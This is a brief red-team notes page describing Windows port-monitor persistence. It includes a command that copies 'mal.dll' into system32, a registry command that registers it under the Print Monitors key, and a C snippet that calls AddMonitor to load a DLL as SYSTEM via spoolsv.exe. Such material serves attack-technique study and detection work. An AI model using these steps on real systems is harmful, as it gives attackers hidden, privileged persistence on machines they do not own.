Port Monitor

Windows provides printing functionality to the user and allows the user to add port monitors for more extendibility. Port monitor is a DLL which connects the spooling service and a printer, and allows to send raw device commands to the printer. We can abuse this for persistence by adding our own arbitrary dll that acts as a "monitor" .

This will be executed as SYSTEM, and will be spawned under spoolsv.exe.

We can do this in 2 ways, via registry or via the AddMonitor function. To do this via registry:

copy c:\mal.dll c:\windows\system32\
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Monitors\PortMonitor" /v Driver /t REG_SZ /d "mal.dll" /f

To do this with the AddMonitor function, here is a code snippet from ired.team that does achieves this:

#include "Windows.h"
 
int main() {
    MONITOR_INFO_2 monitorInfo;
    TCHAR env[12] = TEXT("Windows x64");
    TCHAR name[12] = TEXT("Monitor");
    TCHAR dll[12] = TEXT("test.dll");
    monitorInfo.pName = name;
    monitorInfo.pEnvironment = env;
    monitorInfo.pDLLName = dll;
    AddMonitor(NULL, 2, (LPBYTE)&monitorInfo);
    return 0;
}

Test.dll is the dll that would be persisted, note that you have to copy this over to the system32 folder before you run the above code.

Resources

AddMonitor()Red Teaming Experiments